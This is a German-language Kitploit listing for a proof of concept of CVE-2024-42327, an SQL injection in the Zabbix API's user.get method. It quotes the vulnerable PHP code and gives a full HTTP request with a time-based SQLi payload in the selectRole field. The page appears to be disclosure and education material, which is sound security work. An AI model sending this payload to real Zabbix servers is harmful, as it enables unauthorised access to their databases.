Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-42327 — PoC für CVE-2024-42327 / ZBX-25623 | Kitploit
Tools/GitHubGitHub/compr00t/cve-2024-42327
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

PoC für CVE-2024-42327 / ZBX-25623

Repository anzeigen
185vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für CVE-2024-42327 / ZBX-25623

Ein nicht-administrativer Benutzeraccount im Zabbix-Frontend mit der Standard-Benutzerrolle oder einer anderen Rolle, die API-Zugriff gewährt, kann diese Schwachstelle ausnutzen. Eine SQLi existiert in der CUser-Klasse in der Funktion addRelatedObjects. Diese Funktion wird von der CUser.get-Funktion aufgerufen, die für jeden Benutzer mit API-Zugriff verfügbar ist.

Disclaimer

Dieses Skript wird nur zu Bildungszwecken bereitgestellt!

Proof-of-Concept

Der folgende Code aus Version 6.0.31 ist anfällig für SQLi:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

Der folgende Aufruf löst die Schwachstelle aus:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Referenzen

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Tool herunterladen